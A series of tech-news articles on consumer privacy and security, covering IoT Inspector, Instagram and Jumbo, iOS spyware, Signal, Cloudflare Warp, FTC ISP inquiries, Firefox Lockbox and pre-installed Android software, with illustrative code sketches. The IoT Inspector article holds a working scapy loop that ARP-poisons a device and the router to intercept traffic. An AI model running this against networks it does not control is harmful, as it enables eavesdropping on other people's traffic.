Spy on your smart home with this open source research tool

Researchers at Princeton University have built a web app that lets you (and them) spy on your smart home devices to see what they’re up to.

The open source tool, called IoT Inspector, is available for download here. (Currently it’s macOS only, with a wait list for Windows and Linux.)

In a blog about the effort the researchers write that their aim is to offer a simple tool for consumers to analyze the network traffic of their Internet connected gizmos. The basic idea is to help people see whether devices such as smart speakers or wi-fi enabled robot vacuum cleaners are sharing their data with third parties. (Or indeed how much snitching their gadgets are doing.)

Testing the IoT Inspector tool in their lab, the researchers say they found a Chromecast device constantly contacting Google’s servers even when not in active use.

A Geeni smart bulb was also found to be constantly communicating with the cloud — sending/receiving traffic via a URL (tuyaus.com) that’s operated by a China-based company whose platform controls IoT devices.

There are other ways to track devices like this — such as setting up a wireless hotspot to sniff IoT traffic using a packet analyzer like Wireshark. But the level of technical expertise required puts such methods beyond the reach of many consumers.

The researchers, by contrast, say their web app requires no special hardware or complicated set-up, so it sounds far easier than trying to go packet sniffing your devices yourself. (Gizmodo, which got an early look at the tool, describes it as “incredibly easy to install and use”.)

One wrinkle: the web app doesn’t work with Safari; it requires Firefox or Google Chrome (or another Chromium-based browser).

The main caveat is that the team at Princeton do want to use the gathered data to feed IoT research — so users of the tool will be contributing to efforts to study smart home devices.

The title of their research project is Identifying Privacy, Security, and Performance Risks of Consumer IoT Devices. The listed principal investigators are professor Nick Feamster and postdoctoral researcher Danny Yuxing Huang at the university’s Computer Science department.

The Princeton team says it intends to study the privacy, security and network performance risks of IoT devices. But it also notes it may share the full dataset with other non-Princeton researchers after a standard research ethics approval process. So users of IoT Inspector will be participating in at least one research project. (Though the tool also lets you delete any collected data — per device or per account.)

“With IoT Inspector, we are the first in the research community to produce an open-source, anonymized dataset of actual IoT network traffic, where the identity of each device is labelled,” the researchers write. “We hope to invite any academic researchers to collaborate with us — e.g., to analyze the data or to improve the data collection — and advance our knowledge on IoT security, privacy, and other related fields (e.g., network performance).”

They have produced an extensive FAQ which anyone thinking about running the tool should definitely read before getting involved with a piece of software that’s explicitly designed to spy on your network traffic. (tl;dr, they’re using ARP-spoofing to intercept traffic data — a technique they warn may slow your network, in addition to the risk of their software being buggy.)
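For the curious, here is a rough sketch of the general ARP-spoofing technique, written with the scapy library. It is not IoT Inspector’s actual code, and the addresses are placeholders: the idea is simply to keep telling a device that your machine is the gateway (and vice versa) so its traffic flows through you. In practice root privileges are required, and IP forwarding must be enabled so the device’s connection keeps working.

```python
# Illustrative sketch only, not IoT Inspector's implementation.
# Requires root; enable IP forwarding so traffic still reaches the internet.
import time

from scapy.all import ARP, send

VICTIM_IP = "192.168.1.42"   # hypothetical smart device
GATEWAY_IP = "192.168.1.1"   # hypothetical router

def poison(victim_ip: str, gateway_ip: str) -> None:
    # op=2 is an ARP "is-at" reply; scapy fills in this machine's MAC as
    # the source, so both sides start routing their traffic through us.
    send(ARP(op=2, pdst=victim_ip, psrc=gateway_ip), verbose=False)
    send(ARP(op=2, pdst=gateway_ip, psrc=victim_ip), verbose=False)

while True:
    poison(VICTIM_IP, GATEWAY_IP)
    time.sleep(2)  # re-send so the poisoned ARP cache entries don't expire
```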

The dataset being harvested by the traffic analyzer tool is anonymized, and the researchers specify they’re not gathering any public-facing IP addresses or locations. But there are still some privacy risks — such as if you have smart home devices you’ve named using your real name. So, again, do read the FAQ carefully if you want to participate.

For each IoT device on a network the tool collects multiple data-points and sends them back to servers at Princeton University — including DNS requests and responses; destination IP addresses and ports; hashed MAC addresses; aggregated traffic statistics; TLS client handshakes; and device manufacturers.
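The “hashed MAC addresses” entry is the detail doing the privacy work in that list. Here is a minimal sketch of the idea, with the caveat that the salting scheme shown is an assumption for illustration, not IoT Inspector’s actual implementation.

```python
import hashlib
import secrets

SALT = secrets.token_hex(16)  # hypothetical per-install salt

def hash_mac(mac: str) -> str:
    # A salted SHA-256 digest lets a server correlate reports from the
    # same device without ever learning the raw MAC address.
    return hashlib.sha256((SALT + mac.lower()).encode()).hexdigest()

print(hash_mac("AA:BB:CC:DD:EE:FF"))
```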

The tool has been designed not to track computers, tablets and smartphones by default, given the study’s focus on smart home gizmos. Users can also manually exclude individual smart devices from being tracked, either by powering them down during setup or by specifying their MAC address.

Up to 50 smart devices can be tracked on the network where IoT Inspector is running. Anyone with more than 50 devices is asked to contact the researchers to ask for an increase to that limit.

The project team has also produced a video showing how to install the app on a Mac.

Instagram bug showed Stories to the wrong people

Today in “Facebook apps are too big to manage,” a glitch caused some users’ Instagram Stories trays to show Stories from people they don’t follow.

TechCrunch first received word of the problem from Twitter user InternetRyan who was confused about seeing strangers in his Stories Tray and tagged me in to investigate. The screenshots below show people in his Stories tray whom he doesn’t follow, as proven by the active Follow buttons on their profiles. TechCrunch inquired about the issue, and the next day Instagram confirmed that a bug was responsible and it had been fixed.

Instagram is still looking into the cause of the bug but says it was solved within hours of being brought to its attention. Luckily, if users clicked on the profile pic of someone they didn’t follow in Stories, Instagram’s privacy controls kicked in and wouldn’t display the content. Facebook Stories wasn’t impacted. But the whole situation shakes faith in the Facebook corporation’s ability to properly route and safeguard our data, including that of the 500 million people using Instagram Stories each day.

An Instagram spokesperson provided this statement: “We’re aware of an issue that caused a small number of people’s Instagram Stories trays to show accounts they don’t follow. If your account is private, your Stories were not seen by people who don’t follow you. This was caused by a bug that we have resolved.”

The problem comes after a rough year for Facebook’s privacy and security teams. Outside of all its scrambling to fight false news and election interference, Facebook and Instagram have experienced an onslaught of technical troubles. A Facebook bug changed the status update composer privacy setting of 14 million users, while another exposed up to 6.8 million users’ unposted photos. Instagram bugs have screwed up follower counts and made the feed scroll horizontally. And Facebook was struck by its largest outage ever last month, after its largest data breach ever late last year exposed tons of info on 50 million users.

Facebook and Instagram’s unprecedented scale make them extremely capital efficient and profitable. But that size also leaves tons of surfaces susceptible to problems that can instantly impact huge swaths of the population. Once Facebook has a handle on misinformation, its technical systems could use an audit.

New privacy assistant Jumbo fixes your Facebook & Twitter settings

Jumbo could be a nightmare for the tech giants, but a savior for the victims of their shady privacy practices.

Jumbo saves you hours as well as embarrassment by automatically adjusting 30 Facebook privacy settings to give you more protection, and by deleting your old tweets after saving them to your phone. It can even erase your Google Search and Amazon Alexa history, with clean-up features for Instagram and Tinder in the works.

The startup emerges from stealth today to launch its Jumbo privacy assistant app on iPhone (Android coming soon). What could take a ton of time and research to do manually can be properly handled by Jumbo with a few taps.

The question is whether tech’s biggest companies will allow Jumbo to operate, or squash its access. Facebook, Twitter and the rest really should have built features like Jumbo’s themselves, or made them easier to use, since they could boost people’s confidence in their apps in ways that might increase usage. But since their business models often rely on gathering and exploiting as much of your data as possible, and squeezing engagement from more widely visible content, the giants are incentivized to find excuses to block Jumbo.

“Privacy is something that people want, but at the same time it just takes too much time for you and me to act on it,” explains Jumbo founder Pierre Valade, who formerly built beloved high-design calendar app Sunrise that he sold to Microsoft in 2015. “So you’re left with two options: you can leave Facebook, or do nothing.”

Jumbo makes it easy enough for even the lazy to protect themselves. “I’ve used Jumbo to clean my full Twitter, and my personal feeling is: I feel lighter. On Facebook, Jumbo changed my privacy settings, and I feel safer.” Inspired by the Cambridge Analytica scandal, he believes the platforms have lost the right to steward so much of our data.

Valade’s Sunrise pedigree and plan to follow Dropbox’s bottom-up freemium strategy by launching premium subscription and enterprise features has already attracted investors to Jumbo. It’s raised a $3.5 million seed round led by Thrive Capital’s Josh Miller and Nextview Ventures’ Rob Go, who “both believe that privacy is a fundamental human right,” Valade notes. Miller sold his link-sharing app Branch to Facebook in 2014, so his investment shows those with inside knowledge see a need for Jumbo. Valade’s six-person team in New York will use the money to develop new features and try to start a privacy movement.

How Jumbo works

First let’s look at Jumbo’s Facebook settings fixes. The app asks that you punch in your username and password through a mini-browser open to Facebook instead of using the traditional Facebook Connect feature. That immediately might get Jumbo blocked, and we’ve asked Facebook if it will be allowed. Then Jumbo can adjust your privacy settings to Weak, Medium, or Strong controls, though it never makes any privacy settings looser if you’ve already tightened them.

Valade details that since there are no APIs for changing Facebook settings, Jumbo will “act as ‘you’ on Facebook’s website and tap on the buttons, as a script, to make the changes you asked Jumbo to do for you.” He says he hopes Facebook makes an API for this, though the company is more likely to see his script as a violation of its policies.
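To make that concrete, here’s a hedged sketch of what such a button-tapping script could look like using Selenium browser automation. The URL and selectors are illustrative assumptions (Facebook’s markup changes constantly, which is exactly why this approach is fragile), and this is not Jumbo’s actual code.

```python
from selenium import webdriver
from selenium.webdriver.common.by import By

# Assumes a Chrome profile that is already logged in to Facebook.
driver = webdriver.Chrome()
driver.get("https://www.facebook.com/settings?tab=privacy")  # hypothetical settings URL

# Hypothetical selectors: find the "Who can see your future posts?" row
# and tighten it to "Friends", exactly as a human would by clicking.
driver.find_element(By.XPATH, "//span[text()='Who can see your future posts?']").click()
driver.find_element(By.XPATH, "//span[text()='Friends']").click()

driver.quit()
```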

For example, Jumbo can change who can look you up using your phone number to Strong – Friends only, Medium – Friends of friends, or Weak – Jumbo doesn’t change the setting. Sometimes it takes a stronger stance. For the ability to show you ads based on contact info that advertisers have uploaded, both the Strong and Medium settings hide all ads of this type, while Weak keeps the setting as is.

The full list of what Jumbo can adjust includes: Who can see your future posts?; Who can see the people, Pages and lists you follow?; Who can see your friends list?; Who can see your sexual preference?; Do you want Facebook to be able to recognize you in photos and videos?; Who can post on your timeline?; and Review tags people add to your posts before the tags appear on Facebook? The full list can be found here.

For Twitter, you can choose whether to remove all tweets ever, or only those older than a day, week, month (recommended) or three months. Jumbo never sees the data, as everything is processed locally on your phone. Before deleting the tweets, it archives them to a Memories tab of its app. Unfortunately, there’s currently no way to export the tweets from there, but Jumbo is building Dropbox and iCloud connectivity soon, which will work retroactively to download your tweets. Twitter’s API limits mean it can only erase 3,200 tweets of yours every few days, so prolific tweeters may require several rounds.
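For a sense of what that archive-then-delete loop involves, here’s a minimal sketch against Twitter’s v1.1 API using the tweepy library (v4, where timestamps are timezone-aware). The credentials are placeholders, and Jumbo’s real implementation runs locally on the phone rather than on code like this.

```python
import json
from datetime import datetime, timedelta, timezone

import tweepy

auth = tweepy.OAuth1UserHandler("API_KEY", "API_SECRET", "ACCESS_TOKEN", "ACCESS_SECRET")
api = tweepy.API(auth)

cutoff = datetime.now(timezone.utc) - timedelta(days=30)  # the "older than a month" option

archived = []
# user_timeline only reaches back ~3,200 tweets, which is why prolific
# tweeters may need several rounds.
for tweet in tweepy.Cursor(api.user_timeline, count=200, tweet_mode="extended").items():
    if tweet.created_at < cutoff:
        archived.append(tweet._json)   # archive a local copy first...
        api.destroy_status(tweet.id)   # ...then delete it from Twitter

with open("tweet_archive.json", "w") as f:
    json.dump(archived, f)
```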

Its other integrations are more straightforward. On Google, it deletes your search history. For Alexa, it deletes the voice recordings stored by Amazon. Next it wants to build a way to clean out your old Instagram photos and videos, and your old Tinder matches and chat threads.

Across the board, Jumbo is designed to never see any of your data. “There isn’t a server-side component that we own that processes your data in the cloud,” Valade says. Instead, everything is processed locally on your phone. That means, in theory, you don’t have to trust Jumbo with your data, just to properly alter what’s out there. The startup plans to open source some of its stack to prove it isn’t spying on you.

While there are other apps that can clean your tweets, nothing else is designed to be a full-fledged privacy assistant. Perhaps it’s a bit of idealism to think these tech giants will permit Jumbo to run as intended. Valade hopes that with enough user support, the privacy backlash would be too big for the tech giants to risk blocking Jumbo. “If the social network blocks us, we will disable the integration in Jumbo until we can find a solution to make them work again.”

But even if it does get nixed by the platforms, Jumbo will have started a crucial conversation about how privacy should be handled online. We’ve left control over privacy defaults to companies that earn money when we’re less protected. Now it’s time for that control to shift into the hands of the user.

A powerful spyware app now targets iPhone owners

Security researchers have discovered a powerful surveillance app first designed for Android devices can now target victims with iPhones.

The spy app, found by researchers at mobile security firm Lookout, was built by a developer that abused Apple-issued enterprise certificates to bypass the tech giant’s app store and infect unsuspecting victims.

Disguised as a carrier assistance app, once installed it can silently grab a victim’s contacts, audio recordings, photos, videos and other device information — including their real-time location data. It can be remotely triggered to listen in on people’s conversations, the researchers found. Although there was no data to show who might have been targeted, the researchers noted that the malicious app was served from fake sites purporting to be cell carriers in Italy and Turkmenistan.

Researchers linked the app to the makers of a previously discovered Android app, developed by the same Italian surveillance app maker Connexxa, known to be in use by the Italian authorities.

The Android app, dubbed Exodus, ensnared hundreds of victims — either by installing it or having it installed. Exodus had a larger feature set and expanded spying capabilities by downloading an additional exploit designed to gain root access to the device, giving the app near complete access to a device’s data, including emails, cellular data, Wi-Fi passwords and more, according to Security Without Borders.

Screenshots of the ordinary-looking iPhone app, which was silently uploading a victim’s private data and real-time location to the spyware company’s servers (Image: supplied)

Both of the apps use the same backend infrastructure, and the iOS app uses several techniques — like certificate pinning — to make it difficult to analyze its network traffic, Adam Bauer, Lookout’s senior staff security intelligence engineer, told TechCrunch.

“This is one of the indicators that a professional group was responsible for the software,” he said.
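Certificate pinning is worth unpacking: the client hard-codes a fingerprint of the server certificate it expects and refuses to talk to anything else, so an analyst’s man-in-the-middle proxy gets rejected. A generic Python sketch of the pattern follows; the host name and digest are placeholders, not values from the actual spyware.

```python
import hashlib
import socket
import ssl

HOST = "api.example-backend.com"  # placeholder host
PINNED_SHA256 = "0f1e2d3c..."     # placeholder certificate digest

ctx = ssl.create_default_context()
with socket.create_connection((HOST, 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
        der = tls.getpeercert(binary_form=True)  # the server's certificate, DER-encoded
        if hashlib.sha256(der).hexdigest() != PINNED_SHA256:
            # An interception proxy presents a different certificate,
            # so the client refuses the connection outright.
            raise ssl.SSLError("certificate fingerprint mismatch")
```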

Although the Android version was downloadable directly from Google’s app store, the iOS version was not widely distributed. Instead, Connexxa signed the app with an enterprise certificate issued to the developer by Apple, said Bauer, allowing the surveillance app maker to bypass Apple’s strict app store checks.

Apple says that’s a violation of its rules, which prohibit these certificates, designed to be used strictly for internal apps, from being pushed to consumers.

It follows a similar pattern to several app makers, as discovered by TechCrunch earlier this year, which abused their enterprise certificates to develop mobile apps that evaded the scrutiny of Apple’s app store. Every app served through Apple’s app store has to be certified by Apple or it won’t run. But several companies, like Facebook and Google, used their enterprise-only certificates to sign apps given to consumers. Apple said this violated its rules and banned the apps by revoking the enterprise certificates used by Facebook and Google, knocking both of their illicit apps offline, but also every other internal app signed with the same certificate.

Facebook was unable to operate at full capacity for an entire working day until Apple issued a new certificate.

The certificate Apple issued to Connexxa (Image: supplied)

But Facebook and Google weren’t the only companies abusing their enterprise certificates. TechCrunch found dozens of porn and gambling apps — not permitted on Apple’s app store — signed with an enterprise certificate, circumventing the tech giant’s rules.

After the researchers disclosed their findings, Apple revoked the app maker’s enterprise certificate, leaving every installed copy of the app unable to run.

The researchers said they did not know how many Apple users were affected.

Connexxa did not respond to a request for comment. Apple did not comment.

WhatsApp’s Brian Acton to talk Signal Foundation and leaving Facebook at Disrupt SF

“We give them the power. That’s the bad part. We buy their products. We sign up for these websites. Delete Facebook, right?”

That’s WhatsApp founder Brian Acton’s most recent quote about his former employer, Facebook. Acton has seemingly been fueled by his experience running WhatsApp from within Facebook, which has been scrutinized for profiting from collecting data on users.

Which explains why now, two years after leaving Facebook, Acton has found a new groove as founder and executive chairman of the Signal Technology Foundation, a 501(c)(3) nonprofit organization dedicated to doing the foundational work around making private communication accessible, secure and ubiquitous. Acton invested $50 million of his own money to start Signal Foundation in February of 2018.

At TechCrunch Disrupt SF in October, we’ll hear more from Acton about Signal Foundation and his predictions for the future of communication and privacy. And, of course, we’ll try to learn more about what Facebook was up to with WhatsApp, why he left and how it felt leaving $850 million on the table.

Though he was rejected for positions at Facebook and Twitter in 2009, Acton is actually a Silicon Valley veteran, working in the industry (mostly as a software builder) for more than 25 years at places like Apple, Yahoo and Adobe before founding WhatsApp.

The chat app he built with co-founder Jan Koum grew to 1.5 billion users and, eventually, saw a $19 billion buyout from Mark Zuckerberg in 2014. But when Facebook wanted to lay the basis for targeted ads and commercial messaging within the encrypted chat app he’d spent years building, he walked away.

The Signal Foundation is all about ensuring people have access to private communication that doesn’t cost their own personal data.

“We believe there is an opportunity to act in the public interest and make a meaningful contribution to society by building sustainable technology that respects users and does not rely on the commoditization of personal data,” Acton wrote when it was first announced. In many ways, the Signal Foundation is a symbol and a continuation of Acton’s most expensive moral stand.

We’re thrilled to hear from Acton about what’s next at Signal Foundation. We’ll also try to learn more about his exit at Facebook and his feelings about the products he spent so much time building there.

After all, unsavvy regulators, legions of competitors and user backlash have all failed to compel Facebook to treat people better. But the real power lies with the talent that tech giants fight over. When people like Acton speak up or walk out, employers are forced to listen.

“No filter” is Acton’s style, so get ready for some fireworks when we sit down with him onstage at Disrupt SF.

Disrupt SF runs October 2 to October 4 at the Moscone Center. Tickets are available here.

Cloudflare’s Warp is a VPN that might actually make your mobile connection better

Since its launch on our stage way back in 2010, Cloudflare has focused on making the internet faster and more modern — but the mobile internet has until recently been beyond its reach. Today the company introduced a new service called Warp, described as “the VPN for people who don’t know what VPN stands for.”

In case you’re one of those people, and there’s no shame in it, a VPN is a virtual private network: something that acts as an intermediary between you and the wider internet, allowing you to customize how you connect in many helpful ways, such as changing your apparent location or avoiding IP-based tracking.

The trouble with these services is that many of them just aren’t very good. Trusting a company you’ve never heard of with all your internet traffic just isn’t generally a good idea, and even the biggest and most proven VPN providers are far from household names. What’s more, they can introduce latency and performance issues, which on the mobile web are already trouble enough. In the best case they may take configuration and tweaking that casual users aren’t up to.

Warp, according to a blog post by CEO Matthew Prince, will provide many of the benefits of a VPN with none of the drawbacks, speeding up your connection while adding privacy and security.

“We’ve been tinkering with this idea for three or four years,” Prince told me. Originally there was the idea of making a browser, “but that’s insane,” he said; Apple and Google would crush it. Besides, everything is going app-based and mobile — the real opportunity, they perceived, lay in the layer between those things and the broader internet: “So, a VPN, and it made all the sense in the world for us.”

But they didn’t want to simply compete with a bunch of small providers appealing to a variety of niche power users.

“To be honest, for the vast majority of existing VPN users, this is probably not the right solution for them,” admitted Prince. “If you want to change your country to access Netflix while you’re traveling, there are lots of people that offer that service, but that’s not the market we’re getting into. We wanted something with mass appeal instead of trying to cannibalize what’s out there.”

In order to become a drawback-free default for millions of users, Cloudflare didn’t so much build something from the ground up as adapt nascent work by developers on the cutting edge of networking. It rewrote the already efficient open-source VPN layer WireGuard to be even more so, and added a UDP-based protocol created by Neumob, a company it bought in late 2017. Add to this the large network of Cloudflare servers all around the world and it’s a recipe for a quick, secure service that could very well be both better and faster than your existing connection.

You may remember that at this time last year, Cloudflare debuted its DNS service, 1.1.1.1, both for desktops and mobile (via the 1.1.1.1 app). It’s leveraging this presence to offer Warp as an optional and free upgrade.

So what is it? When your mobile wants to make a connection for a Google search or to get an update for an app or whatever, there’s a whole process of reaching out on the internet, finding the right IP to talk to, establishing a secure connection and so on. Cloudflare’s Warp VPN (like other VPNs) takes over this process, encrypting where it otherwise might not be, but also accelerating it by passing the requests over its own network using that Neumob protocol.
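Warp itself isn’t something you can poke at yet, but the 1.1.1.1 resolver underneath it is. As a small taste of the encrypted-lookup idea, here’s a query against Cloudflare’s public DNS-over-HTTPS endpoint, which is a documented API; this shows just the DNS layer, not Warp.

```python
import requests

resp = requests.get(
    "https://cloudflare-dns.com/dns-query",          # Cloudflare's public DoH endpoint
    params={"name": "techcrunch.com", "type": "A"},
    headers={"accept": "application/dns-json"},
    timeout=5,
)
# The lookup travels over HTTPS instead of plaintext UDP, so on-path
# observers can't see which name was resolved.
for answer in resp.json().get("Answer", []):
    print(answer["name"], answer["data"])
```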

The technical aspects will no doubt be exposed and inspected in time, but Cloudflare claims that using Warp should improve your connection and make it more secure, while preventing your DNS lookup data (which says exactly which sites you request to connect to) from being collected and sold. Prince said his post lacked direct comparisons to existing VPNs because they don’t think those are relevant for the millions of non-VPN-using people they’re targeting with Warp.

“Will people do comparisons? Yes. Will I retweet those when they make us look good? Yes,” Prince said. “But we don’t expect to take a lot of users from them. We want the market to expand — we want to be the biggest VPN in the world without taking a single user from any other provider.”

Part of that is the lack of some of existing VPNs’ most attractive features, such as blocking ads at the IP level. Prince said he and the others at the company were uncomfortable with the idea of picking and choosing content, not least because many of their customers are ad-supported sites. “There’s just something creepy about when the internet’s underlying pipes start making editorial decisions,” Prince said. “When we start messing with the contents of a page, even if people want us to, it sets a dangerous precedent.”

Warp can be offered for free because the company is planning a more high-end service that it’ll sell for a monthly fee. Later, an enterprise version could be sold to replace the clunky ones currently out there (which many of our readers likely have already had the pleasure of using). Prince says he envisions a day when a kid can walk into the living room at home and say, “Mom, the internet is being slow, can I use your corporate VPN?” Unlikely, but even CEOs of major infrastructure companies have dreams. Be kind.

Until then, like the rest of Cloudflare’s connectivity suite, Warp will be free and come with few if any caveats.

Well, except one — it’s not available yet. They wanted to make the announcement on April 1 because it’s exactly a year since they announced 1.1.1.1 (get it? 4/1?), but they missed the date. (“I wanted to just turn this on for everyone, but our tech operations team was like, ‘No. You’re not allowed to do that. The network would fall over.’ “) So what you can do now is get the 1.1.1.1 app and request a spot in line. Since they just announced it, the wait probably won’t be that long… oh.

Okay.

FTC tells ISPs to disclose exactly what information they collect on users and what it’s for

The Federal Trade Commission, in what could be considered a prelude to new regulatory action, has issued an order to several major internet service providers requiring them to share every detail of their data collection practices. The information could expose patterns of abuse or otherwise troubling data use against which the FTC — or states — may want to take action.

The letters requesting info (detailed below) went to Comcast, Google, T-Mobile and both the fixed and wireless sub-companies of Verizon and AT&T. These “represent a range of large and small ISPs, as well as fixed and mobile Internet providers,” an FTC spokesperson said. I’m not sure which is meant to be the small one, but welcome any information the agency can extract from any of them.

Since the Federal Communications Commission abdicated its role in enforcing consumer privacy at these ISPs when it and Congress allowed the Broadband Privacy Rule to be overturned, others have taken up the torch, notably California and even individual cities like Seattle. But for enterprises spanning the nation, national-level oversight is preferable to a patchwork approach, and so it may be that the FTC is preparing to take a stronger stance.

To be clear, the FTC already has consumer protection rules in place and could already go after an internet provider if it were found to be abusing the privacy of its users — you know, selling their location to anyone who asks or the like. (Still no action there, by the way.)

But the evolving media and telecom landscape, in which we see enormous companies devouring one another to best provide as many complementary services as possible, requires constant reevaluation. As the agency writes in a press release:

The FTC is initiating this study to better understand Internet service providers’ privacy practices in light of the evolution of telecommunications companies into vertically integrated platforms that also provide advertising-supported content.

Although the FTC is always extremely careful with its words, this statement gives a good idea of what they’re concerned about. If Verizon (our parent company’s parent company) wants to offer not just the connection you get on your phone, but the media you request, the ads you are served and the tracking you never heard of, it needs to show that these businesses are not somehow shirking rules behind the scenes.

For instance, if Verizon Wireless says it doesn’t collect or share information about what sites you visit, but the mysterious VZ Snooping Co (fictitious, I should add) scoops all that up and then sells it for peanuts to its sister company, that could amount to a deceptive practice. Of course it’s rarely that simple (though don’t rule it out), but the only way to be sure is to comprehensively question everyone involved and carefully compare the answers with real-world practices.

How else would we catch shady zero-rating practices, zombie cookies, backdoor deals or lip service to existing privacy laws? It takes a lot of poring over data and complaints by the detail-oriented folks at these regulatory bodies to find things out.

To that end, the letters to ISPs ask for a whole boatload of information on companies’ data practices. Here’s a summary:

  • categories of personal information collected about consumers or devices, including purposes, methods and sources of collection
  • how the data has been or is being used
  • third parties that provide or are provided this data and what limitations are imposed thereupon
  • how such data is combined with other types of information and how long it is retained
  • internal policies and practices limiting access to this information by employees or service providers
  • any privacy assessments done to evaluate associated risks and policies
  • how data is aggregated, anonymized or deidentified (and how those terms are defined)
  • how aggregated data is used, shared, etc.
  • “any data maps, inventories, or other charts, schematics, or graphic depictions” of information collection and storage
  • total number of consumers who have “visited or otherwise viewed or interacted with” the privacy policy
  • whether consumers are given any choice in collection and retention of data, and what the default choices are
  • total number and percentage of users that have exercised such a choice, and what choices they made
  • whether consumers are incentivized to (or threatened into) opt into data collection and how those programs work
  • any process for allowing consumers to “access, correct, or delete” their personal information
  • data deletion and retention policies for such information

Substantial, right?

Needless to say, some of this information may not be particularly flattering to ISPs. If only 1 percent of consumers have ever chosen to share their information, for instance, that reflects badly on sharing it by default. And if data is capable of being combined across categories or services to de-anonymize users, even potentially, that’s another major concern.

The FTC representative declined to comment on whether there would be any collaboration with the FCC on this endeavor, whether it was preliminary to any other action and whether it can or will independently verify the information provided by the ISPs contacted. That’s an important point, considering how poorly these same companies represented their coverage data to the FCC for its yearly broadband deployment report. A reality check would be welcome.

You can read the rest of the letter here (PDF).

Mozilla’s free password manager, Firefox Lockbox, launches on Android

Mozilla’s free password manager designed for users of the Firefox web browser is today officially arriving on Android. The standalone app, called Firefox Lockbox, offers a simple, if somewhat basic, way for users to access from their mobile device the logins already stored in their Firefox browser.

The app is nowhere near as developed as password managers like 1Password, Dashlane, LastPass and others as it lacks common features like the ability to add, edit or delete passwords; suggest complex passwords; or alert you to potentially compromised passwords resulting from data breaches, among other things.

However, the app is free — and if you’re already using Firefox’s browser, it’s at the very least a more secure alternative to writing down your passwords in an unprotected notepad app, for example. And you can opt to enable Lockbox as an Autofill service on Android.

But the app is really just a companion to Firefox. The passwords in Lockbox securely sync to the app from the Firefox browser — they aren’t entered by hand. For security, the app can be locked with facial recognition or a fingerprint (depending on device support). The passwords are also encrypted in a way that doesn’t allow Mozilla to read your data, it explains in an FAQ.
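That “Mozilla can’t read it” property rests on client-side encryption: a key is derived from your account credentials on the device, and only ciphertext ever syncs. Here’s a generic sketch of the pattern using the cryptography library; it illustrates the concept, not Firefox Sync’s actual (more involved) protocol.

```python
import base64
import os

from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

def derive_key(password: bytes, salt: bytes) -> bytes:
    # Stretch the account password into a 32-byte key, on the device.
    kdf = Scrypt(salt=salt, length=32, n=2**14, r=8, p=1)
    return base64.urlsafe_b64encode(kdf.derive(password))

salt = os.urandom(16)
key = derive_key(b"account-password", salt)

ciphertext = Fernet(key).encrypt(b"example.com login: hunter2")
# Only `ciphertext` and `salt` would ever leave the device; without the
# account password, the server cannot recover the plaintext.
print(Fernet(key).decrypt(ciphertext))
```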

Firefox Lockbox is one of several projects Mozilla developed through its now-shuttered Test Pilot program. Over a few years’ time, the program allowed the organization to trial more experimental features — some of which made their way to official products, like the recently launched file-sharing app, Firefox Send.

Others in the program, including Firefox Color, Side View, Firefox Notes, Price Tracker and Email Tabs, remain available, but are no longer actively developed beyond occasional maintenance releases. Mozilla’s current focus is on its suite of “privacy-first” solutions, not its other handy utilities.

According to Mozilla, Lockbox was downloaded more than 50,000 times on iOS ahead of today’s Android launch.

The Android version is a free download on Google Play.

Android users’ security and privacy at risk from shadowy ecosystem of pre-installed software, study warns

A large-scale independent study of pre-installed Android apps has cast a critical spotlight on the privacy and security risks that preloaded software poses to users of the Google developed mobile platform.

The researchers behind the paper, which has been published in preliminary form ahead of a future presentation at the IEEE Symposium on Security and Privacy, unearthed a complex ecosystem of players with a primary focus on advertising and “data-driven services” — which they argue the average Android user is unlikely to be aware of (while also likely lacking the ability to uninstall or evade the baked-in software’s privileged access to data and resources).

The study, which was carried out by researchers at the Universidad Carlos III de Madrid (UC3M) and the IMDEA Networks Institute, in collaboration with the International Computer Science Institute (ICSI) at Berkeley and Stony Brook University in New York, encompassed more than 82,000 pre-installed Android apps across more than 1,700 devices manufactured by 214 brands, according to the IMDEA institute.

“The study shows, on the one hand, that the permission model on the Android operating system and its apps allow a large number of actors to track and obtain personal user information,” it writes. “At the same time, it reveals that the end user is not aware of these actors in the Android terminals or of the implications that this practice could have on their privacy. Furthermore, the presence of this privileged software in the system makes it difficult to eliminate it if one is not an expert user.”

An example of a well-known app that can come pre-installed on certain Android devices is Facebook.

Earlier this year the social network giant was revealed to have inked an unknown number of agreements with device makers to preload its app. And while the company has claimed these pre-installs are just placeholders (unless or until a user chooses to actively engage with and download the Facebook app), Android users essentially have to take those claims on trust, with no ability to verify them (short of finding a friendly security researcher to conduct a traffic analysis) nor remove the app from their device themselves. Facebook pre-loads can only be disabled, not deleted entirely.

The company’s preloads also sometimes include a handful of other Facebook-branded system apps which are even less visible on the device and whose function is even more opaque.

Facebook previously confirmed to TechCrunch there’s no ability for Android users to delete any of its preloaded Facebook system apps either.

“Facebook uses Android system apps to ensure people have the best possible user experience including reliably receiving notifications and having the latest version of our apps. These system apps only support the Facebook family of apps and products, are designed to be off by default until a person starts using a Facebook app, and can always be disabled,” a Facebook spokesperson told us earlier this month.

But the social network is just one of scores of companies involved in a sprawling, opaque and seemingly interlinked data gathering and trading ecosystem that Android supports and which the researchers set out to shine a light into.

In all, 1,200 developers were identified behind the pre-installed software found in the data-set examined, along with more than 11,000 third-party libraries (SDKs). Many of the preloaded apps were found to display what the researchers dub potentially dangerous or undesired behavior.

The data-set underpinning their analysis was collected via crowd-sourcing methods — using a purpose-built app (called Firmware Scanner), and pulling data from the Lumen Privacy Monitor app. The latter provided the researchers with visibility on mobile traffic flow — via anonymized network flow metadata obtained from its users. 
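You can get a rough feel for the kind of inventory Firmware Scanner performs by enumerating the system partition’s packages on any Android device with developer tools enabled, for example via the standard adb CLI. The sketch below is a stand-in for illustration, not the researchers’ actual tooling.

```python
import subprocess

def list_system_packages() -> list:
    # "pm list packages -s" prints pre-installed (system) packages,
    # one per line, prefixed with "package:".
    out = subprocess.run(
        ["adb", "shell", "pm", "list", "packages", "-s"],
        capture_output=True, text=True, check=True,
    ).stdout
    return [line.split("package:", 1)[1].strip()
            for line in out.splitlines() if line.startswith("package:")]

for pkg in list_system_packages():
    print(pkg)
```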

They also crawled the Google Play Store to compare their findings on pre-installed apps with publicly available apps — and found that just 9% of the package names in their dataset were publicly indexed on Play. 

Another concerning finding relates to permissions. In addition to standard permissions defined in Android (i.e. which can be controlled by the user) the researchers say they identified more than 4,845 owner or “personalized” permissions by different actors in the manufacture and distribution of devices.

That means they found systematic workarounds of user permissions, enabled by scores of commercial deals cut within a non-transparent, data-driven background Android software ecosystem.

